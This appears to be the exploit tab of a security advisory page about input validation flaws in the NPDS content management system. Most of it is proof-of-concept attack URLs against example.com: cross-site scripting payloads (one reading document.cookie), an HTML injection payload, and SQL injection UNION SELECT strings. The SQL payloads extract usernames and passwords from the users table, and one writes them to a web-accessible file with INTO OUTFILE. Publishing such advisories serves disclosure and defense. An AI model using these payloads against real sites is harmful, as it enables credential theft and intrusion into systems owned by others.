• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

NPDS Multiple Input Validation Vulnerabilities

No exploit is required.

Proof of concept examples are available:

Cross-site Scripting:
http://www.example.com/npds/admin.php?mainfile=e&language=<script>alert(document.cookie);</script>

http://www.example.com/npds/powerpack_f.php?language=<script>alert()</script>
//idem pr push.php

http://www.example.com/npds/sdv_infos.php?sitename=<script>alert()</script>

http://www.example.com/faq.php?myfaq=ys&id_cat=99&categories=<script>alert()</script>

http://www.example.com/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_lettre&lettre=<script>alert()</script>

http://www.example.com/reviews.php?op=postcomment&id=1&title=%3Cscript%3Ealert();%3C/script%3E

HTML injection:
http://www.example.com/reply.php?post=1&forum=1&topic=1&stop=2&image_subject="><script>alert('je viens de recuperer ton
cookie');</script>&userdata='&time='&poster_ip='&hostname='&message=test&submit=Valider

SQL injection:
http://www.example.com/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20user
s%20where%20uname<>''/*

http://www.example.com/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/s
qlinjection.txt'/*

• /data/vulnerabilities/exploits/npds_sql_poc